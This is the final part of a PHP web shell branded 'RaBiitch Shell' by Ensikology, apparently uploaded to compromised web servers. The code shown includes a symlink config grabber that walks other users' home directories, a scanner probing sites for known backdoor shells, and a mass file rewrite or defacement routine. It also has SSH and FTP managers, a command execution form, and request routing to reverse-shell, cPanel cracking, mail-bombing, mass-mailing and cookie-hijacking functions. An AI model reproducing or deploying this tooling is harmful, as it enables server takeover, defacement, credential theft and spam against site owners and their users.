  2813. echo "<tr><td>" . $user[0] .
  2814. "</td><td><a
  2815. href='ENSKLG/root/home/" . $user[0] . "/public_html/'
  2816. target=_blank>SymLink</tr>";
  2817. }
  2818. echo
  2819. "</table><br><br><hr><br><br></div>";
  2820. } else {
  2821. echo "<table
  2822. class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
  2823. foreach($akps as $akp) {
  2824. if(eregi("zone", $akp)) {
  2825. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  2826. flush();
  2827. if(strlen(trim($akpzz[1][0])) > 2) {
  2828. $user =
  2829. posix_getpwuid(@fileowner("/etc/valiases/" . $akpzz[1][0]));
  2830. echo "<tr><td><a
  2831. href=http://www." . $akpzz[1][0] . "
  2832. target=_blank>" . $akpzz[1][0] . "</a><td>"
  2833. .
  2834. $user['name'] . "</td><td><a
  2835. href='ENSKLG/root/home/" . $user['name'] . "/public_html/'
  2836. target=_blank>SymLink</a></td></tr></table>";
  2837. flush();
  2838. }
  2839. }
  2840. }
  2841. }
  2842. }
  2843. function shell_finder_ui() {
  2844. echo "<div id=result><center><h2>SH3LL
  2845. SCANNER</h2><hr /><br /><br /><br /><form
  2846. method='GET'>URL : <input size=50 name='sh311_scanx'
  2847. value='http://www.facebook.com/'><input type='submit'
  2848. value='Submit' /></form><br /><br /><hr
  2849. /><br /><br />";
  2850. }
  2851. function shell_finder_bg() {
  2852. $sh_url = $_GET['sh311_scanx'];
  2853. echo "
  2854. <div id=result><center><h2>SHELL
  2855. SCAN</h2><hr /><br /><br /><table
  2856. class='table'>";
  2857. $ShellZ = array(
  2858. "x.jpg.php",
  2859. "indoXploit.php",
  2860. "x.php",
  2861. "ini.php",
  2862. "c99.php",
  2863. "c100.php",
  2864. "baby.php",
  2865. "exp.php",
  2866. "gb.php",
  2867. "html.php",
  2868. "r57.php",
  2869. "php.php",
  2870. "b374k.php",
  2871. "indoxploit.php",
  2872. "c22.php",
  2873. "IndoXploit.php",
  2874. "sym.php",
  2875. "adminer.php",
  2876. "r00t.php",
  2877. "webr00t.php",
  2878. "kontol.php",
  2879. "ref.php",
  2880. "ws.php",
  2881. "qwerty.php",
  2882. "sql.php",
  2883. "cpanel.php",
  2884. "wso.php",
  2885. "gg.php",
  2886. "ghs.php",
  2887. "lonte.php",
  2888. "mmk.php",
  2889. "mmek.php",
  2890. "error_log.php",
  2891. "error.php",
  2892. "garuda.php",
  2893. "s.php",
  2894. "404.php",
  2895. "aarya.php",
  2896. "yellowshell.php",
  2897. "ddos.php",
  2898. "madspot.php",
  2899. "1337.php",
  2900. "31337.php",
  2901. "WSO.php",
  2902. "dz.php",
  2903. "cpn.php",
  2904. "sh3ll.php",
  2905. "mysql.php",
  2906. "killer.php",
  2907. "cgishell.pl",
  2908. "dz0.php",
  2909. "whcms.php",
  2910. "vb.php",
  2911. "gaza.php",
  2912. "d0mains.php",
  2913. "changeall.php",
  2914. "h4x0r.php",
  2915. "L3b.php",
  2916. "zz.php",
  2917. "aa.php",
  2918. "paw.php",
  2919. "crot.php",
  2920. "upz.php",
  2921. "crotz.php",
  2922. "mini.php",
  2923. "crots.php",
  2924. "config.php",
  2925. "koneksi.php",
  2926. "ups.php",
  2927. "shell.php",
  2928. "uploads.php",
  2929. "shell.asp",
  2930. "haha.php",
  2931. "idx.php",
  2932. "d00r.php",
  2933. "12.php",
  2934. "conf.php",
  2935. "d0r.php",
  2936. "pac.php",
  2937. "z.php",
  2938. "cmd.asp",
  2939. "n45ht.php",
  2940. "3213.php",
  2941. "124.php",
  2942. "312.php",
  2943. "askdjh.php",
  2944. "nasth.php",
  2945. "bhtsas.php",
  2946. "nas.php",
  2947. "as.php",
  2948. "lol.php",
  2949. "pacman.php",
  2950. "idx.php",
  2951. "bht.php",
  2952. "asu.php",
  2953. "oke.php",
  2954. "hehe.php",
  2955. "1n7ext.php",
  2956. "home.php",
  2957. "ff.php",
  2958. "ss.php",
  2959. "asd.php",
  2960. "sad.php",
  2961. "c0r0.php",
  2962. "tats.php",
  2963. "cipay.php",
  2964. "library.php",
  2965. "rabiitch.php",
  2966. "aku.php",
  2967. "dor.php",
  2968. "ii.php",
  2969. "alvin.php",
  2970. "4lv1n.php",
  2971. "db.php",
  2972. "sh3ll.asp",
  2973. "b374k-2.2.php",
  2974. "m1n1.php",
  2975. "b374km1n1.php"
  2976. );
  2977. foreach($ShellZ as $shell) {
  2978. $urlzzx = $sh_url . $shell;
  2979. if(function_exists('curl_init')) {
  2980. echo "<tr><td
  2981. style='text-align:left'><font
  2982. color=orange>Checking : </font> <font color=7171C6> $urlzzx
  2983. </font></td>";
  2984. $ch = curl_init($urlzzx);
  2985. curl_setopt($ch, CURLOPT_NOBODY, true);
  2986. curl_exec($ch);
  2987. $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  2988. curl_close($ch);
  2989. if($status_code == 200) {
  2990. echo "<td style='text-align:left'><font
  2991. color=yellow>Found</font></td></tr>";
  2992. } else {
  2993. echo "<td style='text-align:left'><font
  2994. color=red>Not Found...</font></td></tr>";
  2995. }
  2996. } else {
  2997. echo "<font color=red>cURL Not Found
  2998. </font>";
  2999. break;
  3000. }
  3001. }
  3002. echo
  3003. "</table><br><br><hr><br><br></div>";
  3004. }
  3005. function code_in_ui() {
  3006. global $sep;
  3007. $mode = $_POST['modexxx'];
  3008. $ftype = $_POST['ffttype'];
  3009. $c_cont = $_POST['code_cont'];
  3010. $ppp = $_POST['path'];
  3011. if(isset($_POST['modexxx']) && isset($_POST['path'])
  3012. &&
  3013. isset($_POST['ffttype']) && isset($_POST['code_cont']) &&
  3014. $mode != "" && $ftype != "" && $c_cont
  3015. != "" && $ppp != "") {
  3016. echo "<div id=result><center><h2>Mass
  3017. Rewrite Successfully</h2></center><table
  3018. class=tbl>";
  3019. switch($mode) {
  3020. case "Apender":
  3021. $mmode = "a";
  3022. break;
  3023. case "Rewrite":
  3024. $mmode = "w";
  3025. break;
  3026. }
  3027. if($handle = opendir($ppp)) {
  3028. while(($c_file = readdir($handle)) !== False) {
  3029. if((preg_match("/$ftype" . '$' . '/', $c_file,
  3030. $matches) != 0) && (preg_match('/' . $c_file . '$/', $self,
  3031. $matches) != 1)) {
  3032. echo "<tr><td><font
  3033. color=red>$ppp$sep$c_file</font></td></tr>";
  3034. $fd = fopen($ppp . $sep . $c_file, $mmode);
  3035. if($fd) {
  3036. fwrite($fd, $c_cont);
  3037. } else {
  3038. alert("Error. Access Denied");
  3039. }
  3040. }
  3041. }
  3042. }
  3043. echo
  3044. "</table><br><br><hr><br><br></div>";
  3045. } else {
  3046. ?>
  3047. <div id=result><center><h2>Mass
  3048. Rewrite</h2></center><hr><br><br><table
  3049. class=table><form method='POST'><input type='hidden'
  3050. name='path' value="<?php
  3051. echo getcwd();
  3052. ?>"><tr><td>Mode : </td>
  3053. <td><select style='color:yellow; background-color:black;
  3054. border:1px solid #666;'
  3055. name='modexxx'><option>Rewrite</option><option>Apender</option></select></td></tr><tr><td>File
  3056. Type</td><td><input name='ffttype' value='html'
  3057. size=50></td></tr>
  3058. <tr><td>Content : </td><td><textarea
  3059. name='code_cont' rows=20 cols=60
  3060. class='textarea_edit'></textarea></td></tr><tr><td></td><td><input
  3061. type=submit value='submit' class='input_big'
  3062. /></td></tr></form></table><br><br><hr><br><br>
  3063. <?php
  3064. }
  3065. }
  3066. function ssh_man_ui() {
  3067. ?>
  3068. <div id=result><center><h2>SSH
  3069. Manager</h2><hr /><br /><br /><table
  3070. class=table><form method='GET'><tr><td>HOST :
  3071. </td><td><input size=50
  3072. name='ssh_host'></td></tr><tr><td>Username :
  3073. </td><td><input size=50
  3074. name='ssh_user'></td></tr><tr><td>Password :
  3075. </td><td><input size=50
  3076. name='ssh_pass'></td></tr><tr><td></td><td><input
  3077. type='submit' value='submit'
  3078. /></form></table></center><br><br><hr><br><br></div>
  3079. <?php
  3080. }
  3081. function ssh_man_bg() {
  3082. $ssh_h = $_GET['ssh_host'];
  3083. $ssh_u = $_GET['ssh_user'];
  3084. $ssh_p = $_GET['ssh_pass'];
  3085. if(!function_exists('ssh2_connect')) {
  3086. alert("Sorry, Function ssh2_connect is not found");
  3087. }
  3088. $conn = ssh2_connect($ssh_h, 22);
  3089. if(!$conn) {
  3090. alert("SSH Host Not Found");
  3091. }
  3092. $log = ssh2_auth_password($conn, $ssh_u, $ssh_p);
  3093. if(!$log) {
  3094. alert("SSH Authorication failed");
  3095. }
  3096. $shell = ssh2_shell($conn, "bash");
  3097. if($_GET['ssh_cmd'] != "" && $_GET['ssh_cmd']) {
  3098. $ssh_cmd = $_GET['ssh_cmd'];
  3099. fwrite($shell, $ssh_cmd);
  3100. sleep(1);
  3101. while($line = fgets($shell)) {
  3102. flush();
  3103. echo $line . "\n";
  3104. }
  3105. ?>
  3106. <div id=result><center><h2>SSH Shell RaBiitch
  3107. Shell</h2><hr /><br /><br /><textarea
  3108. class='textarea_edit' rows=20 cols=60></textarea>
  3109. <form method='GET'>CMD : <input name='ssh_cmd'
  3110. size=60><input type='submit' value='submit'
  3111. /></form></center><br><br><hr><br><br></div>
  3112. <?php
  3113. } else {
  3114. ?>
  3115. <div id=result><center><h2>SSH Shell RaBiitch
  3116. Shell</h2><hr /><br /><br /><textarea
  3117. class='textarea_edit' rows=20 cols=60></textarea>
  3118. <form method='GET'>CMD : <input name='ssh_cmd'
  3119. size=60><input type='submit' value='submit'
  3120. /></form></center><br><br><hr><br><br></div>
  3121. <?php
  3122. }
  3123. }
  3124. function ftp_man_ui() {
  3125. ?>
  3126. <div id=result><center><h2>FTP
  3127. Manager</h2><hr /><br /><br /><table
  3128. class=table><form method='GET'><tr><td>HOST :
  3129. </td><td><input size=50
  3130. name='ftp_host'></td></tr>
  3131. <tr><td>Username : </td><td><input size=50
  3132. name='ftp_user'></td></tr>
  3133. <tr><td>Password : </td><td><input size=50
  3134. name='ftp_pass'></td></tr>
  3135. <tr><td>Path [<font color=red>Optional</font>]
  3136. : </td><td><input name='fpath'
  3137. size=50></td></tr>
  3138. <tr><td>Upload File From Server [<font
  3139. color=red>Optional</font>] : </td><td><input
  3140. name='upload_file' size=50></td></tr>
  3141. <tr><td>Download File To Server [<font
  3142. color=red>Optional</font>] : </td><td><input
  3143. name='download_file' size=50></td></tr>
  3144. <tr><td></td><td><input type='submit'
  3145. value='submit'
  3146. /></form></table></center><br /><br
  3147. /><hr /><br /><br /></div>
  3148. <?php
  3149. }
  3150. function ftp_man_bg() {
  3151. echo "<div id=result><center><h2>FTP
  3152. FILEMANAGER</h2></center><hr />";
  3153. $fhost = $_GET['ftp_host'];
  3154. $fuser = $_GET['ftp_user'];
  3155. $fpass = $_GET['ftp_pass'];
  3156. $fpath = $_GET['fpath'];
  3157. $upl = $_GET['upload_file'];
  3158. $down = $_GET['download_file'];
  3159. if($fpath == "") {
  3160. $fpath = ftp_pwd($conn);
  3161. }
  3162. $conn = ftp_connect($fhost);
  3163. if(!$conn) {
  3164. alert("FTP Host Not Found!!!");
  3165. }
  3166. $log = ftp_login($conn, $fuser, $fpass);
  3167. if(!$log) {
  3168. alert("FTP Authorication Failed");
  3169. }
  3170. if($upl != "") {
  3171. $fp = fopen($upl, 'r');
  3172. if(ftp_fput($conn, $upl, $fp, FTP_ASCII)) {
  3173. echo "<center><font color=yellow>Successfully
  3174. uploaded <font color=red> $upl </font>
  3175. </font></center>";
  3176. } else {
  3177. echo "<center><font color=red>There was a
  3178. problem while uploading <font color=yellow> $upl
  3179. </font></font></center>";
  3180. }
  3181. }
  3182. if($down != "") {
  3183. $handle = fopen($down, 'w');
  3184. if(ftp_fget($conn, $handle, $down, FTP_ASCII, 0)) {
  3185. echo "<center><font color=yellow>successfully
  3186. written to <font color=red> $down
  3187. </font></font></center>";
  3188. } else {
  3189. echo "<center><font color=red>There was a
  3190. problem while downloading <font color=yellow> $down </font> to
  3191. <font color=yellow> $down
  3192. </font></font></center>";
  3193. }
  3194. }
  3195. echo "<table
  3196. class='table'><tr><th>Files</th>";
  3197. ftp_chdir($fpath);
  3198. $list = ftp_rawlist($conn, $fpath);
  3199. foreach($list as $fff) {
  3200. echo
  3201. "<tr><td><pre>$fff</pre></td></tr>";
  3202. }
  3203. echo "</table></div>";
  3204. }
  3205. // Frond End Calls //
  3206. if(isset($_POST['e_file']) && isset($_POST['e_content_n'])) {
  3207. edit_file_bg();
  3208. } else if(isset($_REQUEST['musik'])) {
  3209. soundcloud();
  3210. } else if(isset($_REQUEST['logger'])) {
  3211. ceklog();
  3212. } else if(isset($_REQUEST['ganteng'])) {
  3213. gantengware();
  3214. } else if(isset($_REQUEST['phpinfo'])) {
  3215. phpinfo();
  3216. } else if(isset($_REQUEST['rctm'])) {
  3217. rctm();
  3218. } else if(isset($_REQUEST['idx'])) {
  3219. idxshell();
  3220. } else if(isset($_REQUEST['xaishell'])) {
  3221. xaishell();
  3222. } else if(isset($_REQUSET['ngindex'])) {
  3223. ngindex();
  3224. } else if(isset($_REQUEST['mini2'])) {
  3225. mini2();
  3226. } elseif(isset($_REQUEST['terjemah'])) {
  3227. terjemah();
  3228. } else if(isset($_REQUEST['cgi'])) {
  3229. cgi();
  3230. } else if(isset($_REQUEST['adminer'])) {
  3231. adminer();
  3232. } else if(isset($_REQUEST['sh311_scanner'])) {
  3233. shell_finder_ui();
  3234. } else if(isset($_REQUEST['ftp_host']) &&
  3235. isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass'])) {
  3236. ftp_man_bg();
  3237. } else if(isset($_REQUEST['ftpman'])) {
  3238. ftp_man_ui();
  3239. } else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user'])
  3240. && isset($_GET['ssh_pass'])) {
  3241. ssh_man_bg();
  3242. } else if(isset($_REQUEST['sshman'])) {
  3243. ssh_man_ui();
  3244. } else if(isset($_REQUEST['c0de_inject']) &&
  3245. isset($_REQUEST['path'])) {
  3246. chdir($_GET['path']);
  3247. code_in_ui();
  3248. } else if(isset($_GET['sh311_scanx'])) {
  3249. shell_finder_bg();
  3250. } else if(isset($_REQUEST['config_grab'])) {
  3251. sym_xxx();
  3252. } else if(isset($_REQUEST['ftp_man'])) {
  3253. ftp_man_ui();
  3254. } else if(isset($_REQUEST['mass_xploit'])) {
  3255. mass_deface_ui();
  3256. } else if(isset($_GET['f_host']) && isset($_GET['f_user'])
  3257. && isset($_GET['f_pass'])) {
  3258. ftp_man_bg();
  3259. } else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
  3260. {
  3261. mass_deface_bg();
  3262. } else if(isset($_REQUEST['ftp_anon_scan'])) {
  3263. ftp_anonymous_ui();
  3264. } else if(isset($_GET['ftp_anonz'])) {
  3265. ftp_anonymous_bg();
  3266. } else if(isset($_REQUEST['killme'])) {
  3267. killme();
  3268. } else if(isset($_REQUEST['hexenc'])) {
  3269. hex_encode_ui();
  3270. } else if(isset($_REQUEST['remotefiledown'])) {
  3271. remote_download_ui();
  3272. } else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile'])
  3273. && isset($_GET['path'])) {
  3274. remote_download_bg();
  3275. } else if(isset($_REQUEST['cpanel_crack'])) {
  3276. cpanel_crack();
  3277. } else if(isset($_REQUEST['rem_web']) &&
  3278. isset($_REQUEST['tryzzz'])) {
  3279. remote_file_check_bg();
  3280. } else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc'])
  3281. && isset($_REQUEST['php_content'])) {
  3282. php_ende_bg();
  3283. } else if(isset($_REQUEST['remote_server_scan'])) {
  3284. remote_file_check_ui();
  3285. } else if(isset($_REQUEST['server_exploit_details'])) {
  3286. exploit_details();
  3287. } else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail'])
  3288. && isset($_REQUEST['subject_mail']) &&
  3289. isset($_REQUEST['mail_content'])) {
  3290. massmailer_bg();
  3291. } else if(isset($_REQUEST['mysqlman'])) {
  3292. mysqlman();
  3293. } else if(isset($_REQUEST['bomb_to']) &&
  3294. isset($_REQUEST['bomb_subject']) &&
  3295. isset($_REQUEST['bmail_content'])) {
  3296. mailbomb_bg();
  3297. } else if(isset($_REQUEST['cookiejack'])) {
  3298. cookie_jack();
  3299. } else if(isset($_REQUEST['massmailer'])) {
  3300. massmailer_ui();
  3301. } else if(isset($_REQUEST['rename'])) {
  3302. chdir($_GET['path']);
  3303. rename_ui();
  3304. } else if(isset($_GET['old_name']) && isset($_GET['new_name'])) {
  3305. chdir($_GET['path']);
  3306. rename_bg();
  3307. } else if(isset($_REQUEST['encodefile'])) {
  3308. php_ende_ui();
  3309. } else if(isset($_REQUEST['edit'])) {
  3310. edit_file();
  3311. } else if(isset($_REQUEST['down']) && isset($_REQUEST['path'])) {
  3312. download();
  3313. } else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path'])) {
  3314. download_gzip();
  3315. } else if(isset($_REQUEST['read'])) {
  3316. chdir($_GET['path']);
  3317. code_viewer();
  3318. } else if(isset($_REQUEST['perm'])) {
  3319. chdir($_GET['path']);
  3320. ch_perm_ui();
  3321. } else if(isset($_GET['path']) && isset($_GET['p_filex'])
  3322. && isset($_GET['new_perm'])) {
  3323. chdir($_GET['path']);
  3324. ch_perm_bg();
  3325. } else if(isset($_REQUEST['del_fil'])) {
  3326. chdir($_GET['path']);
  3327. delete_file();
  3328. exit;
  3329. } else if(isset($_REQUEST['phpinfo'])) {
  3330. chdir($_GET['path']);
  3331. ob_clean();
  3332. echo phpinfo();
  3333. exit;
  3334. } else if(isset($_REQUEST['del_dir'])) {
  3335. chdir($_GET['path']);
  3336. $d_dir = $_GET['del_dir'];
  3337. deldirs($d_dir);
  3338. } else if(isset($_GET['path']) && isset($_GET['new_file'])) {
  3339. chdir($_GET['path']);
  3340. mk_file_ui();
  3341. } else if(isset($_GET['path']) && isset($_GET['new_f_name'])
  3342. && isset($_GET['n_file_content'])) {
  3343. mk_file_bg();
  3344. } else if(isset($_GET['path']) && isset($_GET['new_dir'])) {
  3345. chdir($_GET['path']);
  3346. create_dir();
  3347. } else if(isset($_GET['path']) && isset($_GET['cmdexe'])) {
  3348. chdir($_GET['path']);
  3349. cmd();
  3350. } else if(isset($_POST['upload_f']) && isset($_POST['path'])) {
  3351. upload_file();
  3352. } else if(isset($_REQUEST['rs'])) {
  3353. reverse_conn_ui();
  3354. } else if(isset($_GET['rev_option']) && isset($_GET['my_ip'])
  3355. && isset($_GET['my_port'])) {
  3356. reverse_conn_bg();
  3357. } else if(isset($_REQUEST['safe_mod']) &&
  3358. isset($_REQUEST['path']))
  3359. {
  3360. chdir($_GET['path']);
  3361. safe_mode_fuck_ui();
  3362. } else if(isset($_GET['path']) && isset($_GET['safe_mode'])) {
  3363. safe_mode_fuck();
  3364. } else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) {
  3365. AccessDenied();
  3366. } else if(isset($_REQUEST['symlink'])) {
  3367. sym_link();
  3368. } else if(isset($_GET['path']) && isset($_GET['copy'])) {
  3369. copy_file_ui();
  3370. } else if(isset($_GET['c_file']) && isset($_GET['c_target'])
  3371. && isset($_GET['cn_name'])) {
  3372. copy_file_bg();
  3373. } else {
  3374. filemanager_bg();
  3375. }
  3376. echo "</div>
  3377. <div id=result>
  3378. <center><p>
  3379. <table class='tbl'><tr><td>
  3380. <form method='GET'>PWD :
  3381. <input size='50' name='path' value='" . getcwd() . "'>
  3382. <input type='submit'
  3383. value='submit'></form></td></tr></table>
  3384. <table class='tbl'><tr>
  3385. <td><form style='float:right;' method='GET'>
  3386. <input name='path' value='" . getcwd() . "'
  3387. type=hidden><span> New File : </span>
  3388. <input type='submit' value='submit'>
  3389. <input size='40' name='new_file'></form>
  3390. </td>
  3391. <td><form style='float:left;' method='GET'>
  3392. <input name='path' value='" . getcwd() . "'
  3393. type=hidden>
  3394. <input size='40' name='new_dir'>
  3395. <input type='submit' value='submit'>
  3396. <span> : New Dir</span></form>
  3397. </td>
  3398. </tr>
  3399. <tr>
  3400. <td><form style='float:right;' method='GET'>
  3401. <input style='float:left;' name='path' value='" . getcwd() .
  3402. "' type=hidden>
  3403. <span>CMD : </span>
  3404. <input type='submit' value='submit'>
  3405. <input name='cmdexe' size='40'></form>
  3406. </td>
  3407. <td><form style='float:left;' method='POST'
  3408. enctype=\"multipart/form-data\">
  3409. <input name='path' value='" . getcwd() . "'
  3410. type=hidden>
  3411. <input size='27' name='upload_f' type='file'>
  3412. <input type='submit' name='upload_f' value='submit'>
  3413. <span> : Upload File</span></form>
  3414. </td>
  3415. </tr>
  3416. </table></p>
  3417. <font size=4 color=yellow>
  3418. <a style='color:yellow;text-decoration:none;'
  3419. <a href='https://ensikology.blogspot.com/' title='Ensikology'><font
  3420. color=lime>&copy; Copyright ".date("Y")." Ensikology</a> All Rights Reserved</center>Date
  3421. : $date</font></div>";
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